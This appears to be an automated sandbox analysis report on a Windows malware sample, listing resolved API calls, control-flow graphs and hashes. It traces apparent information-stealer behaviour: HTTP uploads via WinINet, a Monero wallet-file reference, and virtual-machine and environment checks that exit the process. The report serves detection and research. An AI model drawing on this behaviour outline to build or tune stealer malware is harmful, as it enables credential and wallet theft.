                                  • GetProcAddress.KERNEL32(752C0000,01465A90), ref: 006CA53C
                                  • GetProcAddress.KERNEL32(752C0000,01465A10), ref: 006CA554
                                  • GetProcAddress.KERNEL32(752C0000,0147CED0), ref: 006CA56D
                                  • GetProcAddress.KERNEL32(752C0000,0147CEE8), ref: 006CA585
                                  • GetProcAddress.KERNEL32(752C0000,01465850), ref: 006CA59D
                                  • GetProcAddress.KERNEL32(74EC0000,0146B6A8), ref: 006CA5C3
                                  • GetProcAddress.KERNEL32(74EC0000,0146BA68), ref: 006CA5DB
                                  • GetProcAddress.KERNEL32(74EC0000,0147D038), ref: 006CA5F3
                                  • GetProcAddress.KERNEL32(74EC0000,01465870), ref: 006CA60C
                                  • GetProcAddress.KERNEL32(74EC0000,014656B0), ref: 006CA624
                                  • GetProcAddress.KERNEL32(74EC0000,0146B838), ref: 006CA63C
                                  • GetProcAddress.KERNEL32(75BD0000,0147D080), ref: 006CA662
                                  • GetProcAddress.KERNEL32(75BD0000,014658F0), ref: 006CA67A
                                  • GetProcAddress.KERNEL32(75BD0000,01479128), ref: 006CA692
                                  • GetProcAddress.KERNEL32(75BD0000,0147D098), ref: 006CA6AB
                                  • GetProcAddress.KERNEL32(75BD0000,0147D0C8), ref: 006CA6C3
                                  • GetProcAddress.KERNEL32(75BD0000,01465A30), ref: 006CA6DB
                                  • GetProcAddress.KERNEL32(75BD0000,014656D0), ref: 006CA6F4
                                  • GetProcAddress.KERNEL32(75BD0000,0147CE70), ref: 006CA70C
                                  • GetProcAddress.KERNEL32(75BD0000,0147CF00), ref: 006CA724
                                  • GetProcAddress.KERNEL32(75A70000,014657F0), ref: 006CA746
                                  • GetProcAddress.KERNEL32(75A70000,0147CEA0), ref: 006CA75E
                                  • GetProcAddress.KERNEL32(75A70000,0147D0B0), ref: 006CA776
                                  • GetProcAddress.KERNEL32(75A70000,0147CF30), ref: 006CA78F
                                  • GetProcAddress.KERNEL32(75A70000,0147CEB8), ref: 006CA7A7
                                  • GetProcAddress.KERNEL32(75450000,01465710), ref: 006CA7C8
                                  • GetProcAddress.KERNEL32(75450000,01465950), ref: 006CA7E1
                                  • GetProcAddress.KERNEL32(75DA0000,01465890), ref: 006CA802
                                  • GetProcAddress.KERNEL32(75DA0000,0147CE28), ref: 006CA81A
                                  • GetProcAddress.KERNEL32(6F070000,01465A50), ref: 006CA840
                                  • GetProcAddress.KERNEL32(6F070000,014657D0), ref: 006CA858
                                  • GetProcAddress.KERNEL32(6F070000,01465810), ref: 006CA870
                                  • GetProcAddress.KERNEL32(6F070000,0147CF48), ref: 006CA889
                                  • GetProcAddress.KERNEL32(6F070000,01465A70), ref: 006CA8A1
                                  • GetProcAddress.KERNEL32(6F070000,01465910), ref: 006CA8B9
                                  • GetProcAddress.KERNEL32(6F070000,014656F0), ref: 006CA8D2
                                  • GetProcAddress.KERNEL32(6F070000,014658B0), ref: 006CA8EA
                                  • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 006CA901
                                  • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 006CA917
                                  • GetProcAddress.KERNEL32(75AF0000,0147D110), ref: 006CA939
                                  • GetProcAddress.KERNEL32(75AF0000,01479148), ref: 006CA951
                                  • GetProcAddress.KERNEL32(75AF0000,0147D2F0), ref: 006CA969
                                  • GetProcAddress.KERNEL32(75AF0000,0147D188), ref: 006CA982
                                  • GetProcAddress.KERNEL32(75D90000,01465770), ref: 006CA9A3
                                  • GetProcAddress.KERNEL32(6F9D0000,0147D398), ref: 006CA9C4
                                  • GetProcAddress.KERNEL32(6F9D0000,014658D0), ref: 006CA9DD
                                  • GetProcAddress.KERNEL32(6F9D0000,0147D158), ref: 006CA9F5
                                  • GetProcAddress.KERNEL32(6F9D0000,0147D170), ref: 006CAA0D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                  • API String ID: 2238633743-1775429166
                                  • Opcode ID: cf66d27819fe6afb7d7154dc570af7a11926ffa95843faa6ce4145b388da1d2d
                                  • Instruction ID: af9c85e092e5151595cca561cdb8cd550361798832ad962edb014dbaf89b90cf
                                  • Opcode Fuzzy Hash: cf66d27819fe6afb7d7154dc570af7a11926ffa95843faa6ce4145b388da1d2d
                                  • Instruction Fuzzy Hash: D162FDB663C2009FC344DFE8ED88A56BBB9B74D701720861ABA19C7770D735E941EB60
                                  Function 006B48D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 801 6b48d0-6b4992 call 6caab0 call 6b4800 call 6caa50 * 5 InternetOpenA StrCmpCA 816 6b499b-6b499f 801->816 817 6b4994 801->817 818 6b4f1b-6b4f43 InternetCloseHandle call 6cade0 call 6ba210 816->818 819 6b49a5-6b4b1d call 6c8cf0 call 6cac30 call 6cabb0 call 6cab10 * 2 call 6cacc0 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cac30 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cacc0 call 6cac30 call 6cabb0 call 6cab10 * 2 InternetConnectA 816->819 817->816 829 6b4f82-6b4ff2 call 6c8b20 * 2 call 6caab0 call 6cab10 * 8 818->829 830 6b4f45-6b4f7d call 6cab30 call 6cacc0 call 6cabb0 call 6cab10 818->830 819->818 905 6b4b23-6b4b27 819->905 830->829 906 6b4b29-6b4b33 905->906 907 6b4b35 905->907 908 6b4b3f-6b4b72 HttpOpenRequestA 906->908 907->908 909 6b4b78-6b4e78 call 6cacc0 call 6cabb0 call 6cab10 call 6cac30 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cac30 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cac30 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cacc0 call 6cabb0 call 6cab10 call 6cac30 call 6cabb0 call 6cab10 call 6caa50 call 6cac30 * 2 call 6cabb0 call 6cab10 * 2 call 6cade0 lstrlen call 6cade0 * 2 lstrlen call 6cade0 HttpSendRequestA 908->909 910 6b4f0e-6b4f15 InternetCloseHandle 908->910 1021 6b4e82-6b4eac InternetReadFile 909->1021 910->818 1022 6b4eae-6b4eb5 1021->1022 1023 6b4eb7-6b4f09 InternetCloseHandle call 6cab10 1021->1023 1022->1023 1024 6b4eb9-6b4ef7 call 6cacc0 call 6cabb0 call 6cab10 1022->1024 1023->910 1024->1021
                                  APIs
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                    • Part of subcall function 006B4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 006B4889
                                    • Part of subcall function 006B4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 006B4899
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006B4965
                                  • StrCmpCA.SHLWAPI(?,0147EA58), ref: 006B498A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006B4B0A
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,006D0DDE,00000000,?,?,00000000,?,",00000000,?,0147EA08), ref: 006B4E38
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 006B4E54
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 006B4E68
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 006B4E99
                                  • InternetCloseHandle.WININET(00000000), ref: 006B4EFD
                                  • InternetCloseHandle.WININET(00000000), ref: 006B4F15
                                  • HttpOpenRequestA.WININET(00000000,0147EAC8,?,0147E158,00000000,00000000,00400100,00000000), ref: 006B4B65
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                    • Part of subcall function 006CAC30: lstrcpy.KERNEL32(00000000,?), ref: 006CAC82
                                    • Part of subcall function 006CAC30: lstrcat.KERNEL32(00000000), ref: 006CAC92
                                  • InternetCloseHandle.WININET(00000000), ref: 006B4F1F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 460715078-2180234286
                                  • Opcode ID: e7a9d425545b40f30ddae2e660c0e9c01cce865897041e9b04fe25053795812f
                                  • Instruction ID: 79f36edffbd5114fae774170330702c397baaa2d2ef8eb6d1313d5c3e01464a5
                                  • Opcode Fuzzy Hash: e7a9d425545b40f30ddae2e660c0e9c01cce865897041e9b04fe25053795812f
                                  • Instruction Fuzzy Hash: F112C67291011CAACB55EBD0DDA2FFEB37AEF54304F10419DB10666192EF706E48CB6A
                                  Function 006C5760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1090 6c5760-6c57c7 call 6c5d20 call 6cab30 * 3 call 6caa50 * 4 1106 6c57cc-6c57d3 1090->1106 1107 6c57d5-6c5806 call 6cab30 call 6caab0 call 6b1590 call 6c5440 1106->1107 1108 6c5827-6c589c call 6caa50 * 2 call 6b1590 call 6c5510 call 6cabb0 call 6cab10 call 6cade0 StrCmpCA 1106->1108 1124 6c580b-6c5822 call 6cabb0 call 6cab10 1107->1124 1133 6c58e3-6c58f9 call 6cade0 StrCmpCA 1108->1133 1138 6c589e-6c58de call 6caab0 call 6b1590 call 6c5440 call 6cabb0 call 6cab10 1108->1138 1124->1133 1140 6c5a2c-6c5a94 call 6cabb0 call 6cab30 * 2 call 6b16b0 call 6cab10 * 4 call 6b1670 call 6b1550 1133->1140 1141 6c58ff-6c5906 1133->1141 1138->1133 1270 6c5d13-6c5d16 1140->1270 1144 6c590c-6c5913 1141->1144 1145 6c5a2a-6c5aaf call 6cade0 StrCmpCA 1141->1145 1149 6c596e-6c59e3 call 6caa50 * 2 call 6b1590 call 6c5510 call 6cabb0 call 6cab10 call 6cade0 StrCmpCA 1144->1149 1150 6c5915-6c5969 call 6cab30 call 6caab0 call 6b1590 call 6c5440 call 6cabb0 call 6cab10 1144->1150 1164 6c5ab5-6c5abc 1145->1164 1165 6c5be1-6c5c49 call 6cabb0 call 6cab30 * 2 call 6b16b0 call 6cab10 * 4 call 6b1670 call 6b1550 1145->1165 1149->1145 1250 6c59e5-6c5a25 call 6caab0 call 6b1590 call 6c5440 call 6cabb0 call 6cab10 1149->1250 1150->1145 1171 6c5bdf-6c5c64 call 6cade0 StrCmpCA 1164->1171 1172 6c5ac2-6c5ac9 1164->1172 1165->1270 1201 6c5c78-6c5ce1 call 6cabb0 call 6cab30 * 2 call 6b16b0 call 6cab10 * 4 call 6b1670 call 6b1550 1171->1201 1202 6c5c66-6c5c71 Sleep 1171->1202 1180 6c5acb-6c5b1e call 6cab30 call 6caab0 call 6b1590 call 6c5440 call 6cabb0 call 6cab10 1172->1180 1181 6c5b23-6c5b98 call 6caa50 * 2 call 6b1590 call 6c5510 call 6cabb0 call 6cab10 call 6cade0 StrCmpCA 1172->1181 1180->1171 1181->1171 1275 6c5b9a-6c5bda call 6caab0 call 6b1590 call 6c5440 call 6cabb0 call 6cab10 1181->1275 1201->1270 1202->1106 1250->1145 1275->1171
                                  APIs
                                    • Part of subcall function 006CAB30: lstrlen.KERNEL32(006B4F55,?,?,006B4F55,006D0DDF), ref: 006CAB3B
                                    • Part of subcall function 006CAB30: lstrcpy.KERNEL32(006D0DDF,00000000), ref: 006CAB95
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006C5894
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006C58F1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006C5AA7
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                    • Part of subcall function 006C5440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006C5478
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                    • Part of subcall function 006C5510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006C5568
                                    • Part of subcall function 006C5510: lstrlen.KERNEL32(00000000), ref: 006C557F
                                    • Part of subcall function 006C5510: StrStrA.SHLWAPI(00000000,00000000), ref: 006C55B4
                                    • Part of subcall function 006C5510: lstrlen.KERNEL32(00000000), ref: 006C55D3
                                    • Part of subcall function 006C5510: lstrlen.KERNEL32(00000000), ref: 006C55FE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006C59DB
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006C5B90
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006C5C5C
                                  • Sleep.KERNEL32(0000EA60), ref: 006C5C6B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleep
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 507064821-2791005934
                                  • Opcode ID: b81bd3b276f56a1a341c2d2335c84894e7dc365f1e85bb1e293464839e8c0d51
                                  • Instruction ID: caf24ead2924d7cf4325cf79b5d22150967b114c76ab578dfa46bd1bbee2471c
                                  • Opcode Fuzzy Hash: b81bd3b276f56a1a341c2d2335c84894e7dc365f1e85bb1e293464839e8c0d51
                                  • Instruction Fuzzy Hash: F8E10E729105089ACB54FBE0EDA6FFD733AEF54304F40855CA50766191EF34AE48CBAA
                                  Function 006C19F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1301 6c19f0-6c1a1d call 6cade0 StrCmpCA 1304 6c1a1f-6c1a21 ExitProcess 1301->1304 1305 6c1a27-6c1a41 call 6cade0 1301->1305 1309 6c1a44-6c1a48 1305->1309 1310 6c1a4e-6c1a61 1309->1310 1311 6c1c12-6c1c1d call 6cab10 1309->1311 1312 6c1bee-6c1c0d 1310->1312 1313 6c1a67-6c1a6a 1310->1313 1312->1309 1315 6c1aad-6c1abe StrCmpCA 1313->1315 1316 6c1acf-6c1ae0 StrCmpCA 1313->1316 1317 6c1a85-6c1a94 call 6cab30 1313->1317 1318 6c1bc0-6c1bd1 StrCmpCA 1313->1318 1319 6c1b41-6c1b52 StrCmpCA 1313->1319 1320 6c1ba1-6c1bb2 StrCmpCA 1313->1320 1321 6c1b82-6c1b93 StrCmpCA 1313->1321 1322 6c1b63-6c1b74 StrCmpCA 1313->1322 1323 6c1afd-6c1b0e StrCmpCA 1313->1323 1324 6c1b1f-6c1b30 StrCmpCA 1313->1324 1325 6c1bdf-6c1be9 call 6cab30 1313->1325 1326 6c1a99-6c1aa8 call 6cab30 1313->1326 1327 6c1a71-6c1a80 call 6cab30 1313->1327 1350 6c1aca 1315->1350 1351 6c1ac0-6c1ac3 1315->1351 1329 6c1aee-6c1af1 1316->1329 1330 6c1ae2-6c1aec 1316->1330 1317->1312 1344 6c1bdd 1318->1344 1345 6c1bd3-6c1bd6 1318->1345 1335 6c1b5e 1319->1335 1336 6c1b54-6c1b57 1319->1336 1341 6c1bbe 1320->1341 1342 6c1bb4-6c1bb7 1320->1342 1339 6c1b9f 1321->1339 1340 6c1b95-6c1b98 1321->1340 1337 6c1b76-6c1b79 1322->1337 1338 6c1b80 1322->1338 1331 6c1b1a 1323->1331 1332 6c1b10-6c1b13 1323->1332 1333 6c1b3c 1324->1333 1334 6c1b32-6c1b35 1324->1334 1325->1312 1326->1312 1327->1312 1352 6c1af8 1329->1352 1330->1352 1331->1312 1332->1331 1333->1312 1334->1333 1335->1312 1336->1335 1337->1338 1338->1312 1339->1312 1340->1339 1341->1312 1342->1341 1344->1312 1345->1344 1350->1312 1351->1350 1352->1312
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 006C1A15
                                  • ExitProcess.KERNEL32 ref: 006C1A21
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 73bd5f095d4cbe24f579068ef3c125f9be90c8349cefdb1d5f402817b9fc1c9e
                                  • Instruction ID: 7c246cb936ac00bfc7d44a7c23cd81f98e2925f8c4f6106dddc134cb197ed4da
                                  • Opcode Fuzzy Hash: 73bd5f095d4cbe24f579068ef3c125f9be90c8349cefdb1d5f402817b9fc1c9e
                                  • Instruction Fuzzy Hash: 8951D474A08209ABDB04DFD4D954FBEB7BAEF46704F20408DE412AB351E774EA41DBA1
                                  Function 006C6C90 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,01472320), ref: 006C9BF1
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,01472350), ref: 006C9C0A
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,01472380), ref: 006C9C22
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,014724D0), ref: 006C9C3A
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,01472398), ref: 006C9C53
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,014791D8), ref: 006C9C6B
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,01465E50), ref: 006C9C83
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,01465BF0), ref: 006C9C9C
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,014723B0), ref: 006C9CB4
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,014723C8), ref: 006C9CCC
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,01472500), ref: 006C9CE5
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,014723E0), ref: 006C9CFD
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,01465E30), ref: 006C9D15
                                    • Part of subcall function 006C9BB0: GetProcAddress.KERNEL32(74DD0000,01472218), ref: 006C9D2E
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                    • Part of subcall function 006B11D0: ExitProcess.KERNEL32 ref: 006B1211
                                    • Part of subcall function 006B1160: GetSystemInfo.KERNEL32(?), ref: 006B116A
                                    • Part of subcall function 006B1160: ExitProcess.KERNEL32 ref: 006B117E
                                    • Part of subcall function 006B1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 006B112B
                                    • Part of subcall function 006B1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 006B1132
                                    • Part of subcall function 006B1110: ExitProcess.KERNEL32 ref: 006B1143
                                    • Part of subcall function 006B1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 006B123E
                                    • Part of subcall function 006B1220: ExitProcess.KERNEL32 ref: 006B1294
                                    • Part of subcall function 006C6A10: GetUserDefaultLangID.KERNEL32 ref: 006C6A14
                                    • Part of subcall function 006B1190: ExitProcess.KERNEL32 ref: 006B11C6
                                    • Part of subcall function 006C79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006B11B7), ref: 006C7A10
                                    • Part of subcall function 006C79E0: RtlAllocateHeap.NTDLL(00000000), ref: 006C7A17
                                    • Part of subcall function 006C79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 006C7A2F
                                    • Part of subcall function 006C7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006C7AA0
                                    • Part of subcall function 006C7A70: RtlAllocateHeap.NTDLL(00000000), ref: 006C7AA7
                                    • Part of subcall function 006C7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 006C7ABF
                                    • Part of subcall function 006CACC0: lstrlen.KERNEL32(?,01478F58,?,\Monero\wallet.keys,006D0E1A), ref: 006CACD5
                                    • Part of subcall function 006CACC0: lstrcpy.KERNEL32(00000000), ref: 006CAD14
                                    • Part of subcall function 006CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 006CAD22
                                    • Part of subcall function 006CABB0: lstrcpy.KERNEL32(?,006D0E1A), ref: 006CAC15
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01479118,?,006D10F4,?,00000000,?,006D10F8,?,00000000,006D0AF3), ref: 006C6D6A
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 006C6D88
                                  • CloseHandle.KERNEL32(00000000), ref: 006C6D99
                                  • Sleep.KERNEL32(00001770), ref: 006C6DA4
                                  • CloseHandle.KERNEL32(?,00000000,?,01479118,?,006D10F4,?,00000000,?,006D10F8,?,00000000,006D0AF3), ref: 006C6DBA
                                  • ExitProcess.KERNEL32 ref: 006C6DC2
                                  Memory Dump Source
